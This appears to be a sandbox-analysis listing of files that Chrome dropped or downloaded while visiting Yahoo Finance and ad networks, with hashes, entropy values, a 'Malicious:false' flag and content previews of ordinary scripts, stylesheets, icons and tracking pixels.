                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EC70E39601BB108B806085AE9A331484F4391A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C7389535EF36198F9C1F986D8A1B0BB3E8A7174225DD6F861CE4EA0782323D88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B0B3B3C784ADAB1B1842D1FFE07569D9282EFFF58EEB6E3088B651A145B2F4B1B8BB92FE43CEBB141F65585C057B712B652A8F087972D6D2AE0805A00593E307
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const G=Math.min,_=Math.max,tt=Math.round,N=t=>({x:t,y:t}),Dt={left:"right",right:"left",bottom:"top",top:"bottom"},kt={start:"end",end:"start"};function ct(t,e,o){return _(t,G(e,o))}function Q(t,e){return typeof t=="function"?t(e):t}function M(t){return t.split("-")[0]}function U(t){return t.split("-")[1]}function vt(t){return t==="x"?"y":"x"}function dt(t){return t==="y"?"height":"width"}function X(t){return["top","bottom"].includes(M(t))?"y":"x"}function mt(t){return vt(X(t))}function Nt(t,e,o){o===void 0&&(o=!1);const n=U(t),i=mt(t),r=dt(i);let s=i==="x"?n===(o?"end":"start")?"right":"left":n==="start"?"bottom":"top";return e.reference[r]>e.floating[r]&&(s=et(s)),[s,et(s)]}function Ft(t){const e=et(t);return[lt(t),e,lt(e)]}function lt(t){return t.replace(/start|end/g,e=>kt[e])}function Vt(t,e,o){const n=["left","right"],i=["right","left"],r=["top","bottom"],s=["bottom","top"];switch(t){case"top":case"bottom":return o?e?i:n:e?n:i;case"left":case"right":return e?r:s;default:return[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209769182472249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:RUAOqJDh2TCbRM4wn1fhPB9WieXIpW/tigBeJgnpNF6s5:SAXJDhXM1fIie40liy1p6s5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CCC8E8622D9B302E99027D98B5ED6442
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C1005DA8DE172CAB3861617CCBEC0D0B5E446CF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9D7D167400955D50562C84BA9DB06FBE0E6946BC69D21CDB02A13764F44BA62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B76577A44256D3E63A7DCC0E7575D356E9B04C6D4D1BDA67B82D850738DDFD81B4846E4380AF9E863E70434F7E55E633903A97F8D978561350F34449AF07F1D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var l=(r=>(r.DESTROYED="nimbus:ad-destroyed",r.AD_CONTROLLER_READY="nimbus:ad-controller-ready",r))(l||{});function m(r){return new CustomEvent("nimbus:ad-destroyed",{detail:r})}function S(r){return new CustomEvent("nimbus:ad-controller-ready",{detail:r})}function y(r,n){return r.replace(/{{(.*?)}}/g,(e,t)=>n[t]!=null?n[t].toString():e)}function b(r,n={}){return Object.entries(r).reduce((e,[t,i])=>{if(i)if("path"in i){const a=y(i.path,n);e[t]={...i,path:a}}else e[t]=i;return e},{})}function f(r){return Array.isArray(r)&&r.length===2&&typeof r[0]=="number"&&typeof r[1]=="number"}function s(r,n=","){return Array.isArray(r)?f(r)?r.join("x"):r.map(e=>Array.isArray(e)?e.join("x"):e.toString()).join(n):r??""}function c(r,{width:n}){return r[0]<=n}function g(r,n){if(!Array.isArray(r))return r;if(f(r))return c(r,n)?r:void 0;const e=r.filter(t=>!f(t)||c(t,n));return e.length?e:void 0}const d=10;function h(r){if(Array.isArray(r)){if(f(r)){const[n,e]=r;return e<d?void 0:e}for(const n of r){if(!f(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:glTF binary model, version 2, length 1841952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1841952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.86927842319831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:NJ2AYlfCy6sMGu403r//q1ipQE9L6aNzFuLXpgc:NwAYhH25L37q1IQEd1NJurp1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F8FAB757395B1D3E4F37A079489271BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:401A8F8FEB388DA74E74D9A06732FBF1C6E350DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:02E2BE780B07C3BC5026A1E7D90C4B7AED7C9C557526D52101596BD8638C57BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1CD38D0D0B9355580874029BBA6FFD09E2788411B97C236AA3CE16E19FF14217E6EC5A8142A6BAA6BF19A05F85FE45B5A871851CF8BF5E8855C552C8B792556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/creatives/assets/4858849/2024_XT4_SPORT_EXT_v07.glb.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:glTF.... ....)..JSON{"accessors":[{"componentType":5126,"count":2651,"max":[-70.35702514648438,146.69488525390625,105.8648681640625],"min":[-528.452880859375,26.264026641845703,-107.17500305175781],"type":"VEC3"},{"componentType":5126,"count":2651,"type":"VEC2"},{"componentType":5126,"count":2651,"type":"VEC3"},{"componentType":5123,"count":12495,"type":"SCALAR"},{"componentType":5126,"count":665,"max":[-88.003662109375,144.195556640625,84.04291534423828],"min":[-518.326171875,37.52769470214844,-84.03582000732422],"type":"VEC3"},{"componentType":5126,"count":665,"type":"VEC2"},{"componentType":5126,"count":665,"type":"VEC3"},{"componentType":5123,"count":2832,"type":"SCALAR"},{"componentType":5126,"count":2179,"max":[-183.5447998046875,143.3338623046875,81.40294647216797],"min":[-519.1409912109375,34.82791519165039,-79.76844024658203],"type":"VEC3"},{"componentType":5126,"count":2179,"type":"VEC2"},{"componentType":5126,"count":2179,"type":"VEC3"},{"componentType":5123,"count":6879,"ty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3759
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.907581191132203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:X3/7NZ3tz6NLvFwg0jCKC4P1cTiy8NOgoAH9SZOwb:X3zD3tz0vFwnWR4QiIA0Zvb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8634CEE42B68C501DA8D76BEEE00BF86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:346A50344174EC7C53CDD48080A55F7CD3A7C164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:890B9F9ED3F5AB8390B86F93B5B8BA0C2D5D50A5DC21668734B3537BC3A65F53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:405E62A3F1C24476041F90DDB5E50801693578A1B3E108919EDCDE05BB429BAD77FC60B0096ADBAA9A2704835EBD7DC165720AD0A14ADA9498B3234D361EF259
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....vIDATx^.yX....3 ...}n=..Z.].Y.iN9#..8.8..."jjN(..*.9....(.29.u.PT....P......Al{...?.....Bi..Y{..=.i...G)..J..P...R.5.....l..`k(.[C)..J..P...R.5.B.0..0j..4c!.....f.$."....5......I.H.`......P2.!.F....i&.A.......~/..$....3Y.R....;z5kf...a.V..........(8FG..h.Z....0|s!.M.......`4......B..@4..M..._...~......nm@.....E...Q..Z..Y.:.Q;g..d.......Y.R..~x.hG-..J..p......$.$.E.@..#.s.0.<..Z.....HT.v..n.D..0TN?....RF.>....w.B......w...m...V...3./ .lB......x.....d5...>\..yk..Y.R..3.oj..5[.uG"Z......h.|...D.C'.u.Q|u...p...E._...|..R.Q-5...*7...3... .b..........~...y3>|....e..$B.'+Q)w.;...7hv4|J..Nm._w.....v.y..~..v.A3..ih...:..1.P..Q..._...#Q..!TO.C..0..........,..T..IB..b.6T .*.oE.{.I.M..`#....[.W...k.....zV+P..b..i...7.u.U.....k~...x8..m.I.Z.e..."..(&._..N8....H..c...(.~.D.G.P..!z'..+.Q.nT.N...lC.<..>w.f....o..;o.H.o6(...P,..4...3+.=._E.%..<..W'....v..8n=..;.E.i4.9.o.O.a.q.;B..../NG.V|4j^.NH>..7".\.J.....J.A..$.m.@..;P5w;*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):161
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139728931781201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHCUOFUOGLFUUvXALLGQkHgwdIF8IAdSfFED:+9mc4sl3O4XWMvXA3kHgwKFSZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D2EAE957630F2A5473DCF80198ECE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2CEABA184D273AF24CF40F5AF121FB44E4DA9014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B74434EE99707AD7DF004D009EB9F45DA79EB0FA8010B15557EC7D9FC550D3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:946DC490B794374A75D318383FD86A900D61DFB20A14B14F8FD274428721209F8746CB84CA2415CAE4D06C1E1AFEA26A07F0602462BAE23F9961FB8DAAD167B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12 4-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8z"/></svg>';export{w as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3200)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.422949070072847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:d7Sm8IrHwU292K89kvsug83ysBFnzVFbfN1R8Mr5+I:dGmqU2UOgUhBFrbfN1R8MN+I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:45BDA4394B36796300FB4F6D921B62E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA792C77EC91821354E0328D169151008FE38D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E51B95EBC0C428A6744D634A81156BF8DC888ED526957F2C1B62BB6807E0381F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A71BE08A7FDD5F4E7D98EFB032868C50E0208BD17D144929459777298F30E80592ACC36DD8ED0DD4FF264251E09DFF56070370758FA6B35B021CFADA7FE5DD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as I,p as N,k as P,i as _,o as V,e as w,d as x,f as C,q as M,l as z,Q as D,n as E}from"./scheduler.Dr9AAxFe.js";import{S as j,i as v,g as Q,a as g,e as B,t as y,c as K,b as L,m as T,j as G,d as q}from"./index.DCSmZEjO.js";import{g as H,h as J}from"./commonUtil.CI22_Irn.js";import{S as O}from"./StoryStream.GPqEXWl1.js";import{S as R}from"./Spinner.CydnjLPC.js";import{f as U}from"./index.C_UqkgE3.js";import{l as W}from"./loadNewsStream.DY3Ht2xd.js";function X(i){let e,t,a,m,l;return a=new O({props:{stream:i[5],i13nModel:{sec:"qsp-news",...i[0]},maxStoryCount:i[2],onLoadMore:i[7],storyItemProps:{maxTickers:i[4],imageKey:i[3],size:"x-large"}}}),{c(){e=w("div"),t=w("div"),K(a.$$.fragment),this.h()},l(r){e=x(r,"DIV",{class:!0,"data-testid":!0});var s=C(e);t=x(s,"DIV",{class:!0});var n=C(t);L(a.$$.fragment,n),n.forEach(_),s.forEach(_),this.h()},h(){M(t,"class","holder yf-1napat3"),M(e,"class","news-stream yf-1napat3"),M(e,"data-testid","news-stream")},m(r,s){P(r,e,s),z(e,t),T(a,t,nul
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1176)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1177
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.975780216942456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:c45pAMuhiDoVXng57I+C4IgvCQC8Ui562gqGAz5eRn:cWv0fZg5UmKlf3vqG7Rn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C15DD69D7577D47739EFE0693FB9742C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EB4470BD91D7909A8512FFADC38CADDBA408290B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF5CB8BA572866A383546642AE22499CAE9D309FF33E549AB9834370751C13BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:329C5773EDCBB54905609979291E9B5E069C7DC6EBD08F10F6AFEB81437AC27649026C683BC8C0ECA4A6E5C6EF2B724B800C0508A74EC94E1D596FFDB344CC34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/SkeletonLoader.YZvit63q.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.loader.yf-10mmfrb{position:relative;width:100%;height:100%;opacity:.6;background-color:var(--separator);border-radius:var(--border-radius-m);overflow:hidden}.loader.yf-10mmfrb:after{position:absolute;top:0;right:0;bottom:0;left:0;transform:translate(-100%);animation:yf-10mmfrb-skeleton-loading 1s linear infinite alternate;will-change:transform;background-image:linear-gradient(90deg,#fff0 0,#fff3 20%,#ffffff80 60%,#fff0);content:""}@keyframes yf-10mmfrb-skeleton-loading{to{transform:translate(100%)}}.loader.text.yf-10mmfrb{height:1rem;margin-bottom:var(--space-1)}.loader.text.yf-10mmfrb:last-child{width:80%;margin-bottom:0}.loader.price.yf-10mmfrb{height:1rem;min-width:4ch}.loader.price.yf-10mmfrb:last-child{width:80%;margin-bottom:0}.loader.card.yf-10mmfrb{height:3rem;margin-bottom:var(--space-3);border-radius:var(--border-radius-none)}.loader.card.yf-10mmfrb:last-child{height:2rem;margin-bottom:0}.loader.storyImg.yf-10mmfrb{width:100%;padding-bottom:77.77%;height:unset;margin-bottom:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.748805071873871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHXDFhCTL6lRcoFU6uSvHBXheF/cazTPH8KFAh:H69mc4sl3O4zDQL6Akd/Bg+fb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:14EA00F1960955017A2D326CE7DD4901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9E6218631E95A6197E972A28CFF3F6CF12996DBE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0D1B099D5A0C41A08AF16526735EA6A3C14FF505892302D1D5588A9FED26CEFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE2CDC29D7B7E03D9245858B251BC1E8F13E0D38B4A664B45F36E1A82DF74D6624E9BDAA749D2C8F40D8E892E0F2EBBECEA9CA915D28C53D34FB87FCC2178D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/close.C3ug6nNR.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2101)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.869261289005738
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:BLtAi6vR8StmMe0fPMdVLB/hqgtdgowvekIj:BLtAi658SUMe0fPMdzb9wWzj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:319E6D40D27E5ED5627DE1EA6EB2A52D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BA91A8A7305DC2856546FD08D707BFC19DB8759C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6DF070481FB2EE4566FC9D81976634A4CEE33502046FA4ECB6DEFC712638AE20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:36747FD7633FC19C927E710774719BEB483CA22149D2167E3F64759ABE76137EA681FED88DAA8386ADDA5D901A3246467C4400E519E238864E0C9952B996361D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Card.CXxu1kiL.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.card.yf-xvi0tx.yf-xvi0tx{--card-spacing:var(--custom-spacing, var(--space-2));background-color:var(--surface2);border-radius:var(--border-radius-m);position:relative;gap:var(--custom-gap-spacing, var(--card-spacing));padding:var(--card-spacing);display:flex;flex-direction:column}.card.sticky.yf-xvi0tx.yf-xvi0tx{scroll-snap-align:start}.card.bdr.yf-xvi0tx.yf-xvi0tx,.card.yf-xvi0tx .card-link.bdr.yf-xvi0tx,.card.yf-xvi0tx .card-btn.bdr.yf-xvi0tx{border:1px solid var(--separator)}.card.yf-xvi0tx .card-link.yf-xvi0tx,.card.yf-xvi0tx .card-btn.yf-xvi0tx{cursor:pointer;position:absolute;top:0;left:0;width:100%;height:100%;content:"";border-radius:inherit;border:1px solid transparent}.card.yf-xvi0tx .card-link.yf-xvi0tx:hover,.card.yf-xvi0tx .card-link.yf-xvi0tx:focus,.card.yf-xvi0tx .card-btn.yf-xvi0tx:hover,.card.yf-xvi0tx .card-btn.yf-xvi0tx:focus{box-shadow:var(--shadow1)}.card.yf-xvi0tx .card-link.yf-xvi0tx:disabled,.card.yf-xvi0tx .card-btn.yf-xvi0tx:disabled{cursor:auto;box-shadow:non
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.yieldmo.com/v000/sync?pn_id=criteo&id=e441f379-aed3-4b84-bb14-a89f169e96b5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2177)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):112805
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.539654577125179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YXP8fph9T1TFj+U+pM7OlXYM+Mn8sQXWdASrtlRhBZLjb6ke13zv7x+:vRh1lcnUGdAElRhBZH+ksTt+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:366DAFF9909083EC6E0C67561FB35EC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EB44AB2F563F148B25F718B31CC24ABBAAF1C3FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:40B3B4542E4D05F6BBD68E7EBA6D424ABFFD64FB9CC3BA8C8C9C932F088C787A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11383C0ADFACB7129612DC521AD45D0E3F77424691E8F80A99293D1ED624C1B4A94C557B2E1A14C73E4096AB5E80827D5A7635DC177D30AE02C0D9B663912884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/js/dv3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(stc){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object"); .},da=ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}; .p("Symbol",function(a){if(a)return a;var b=function(f,h){this.nc=f;ba(this,"description",{configurable:!0,writable:!0,value:h})};b.prototype.toString=function(){return this.nc};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
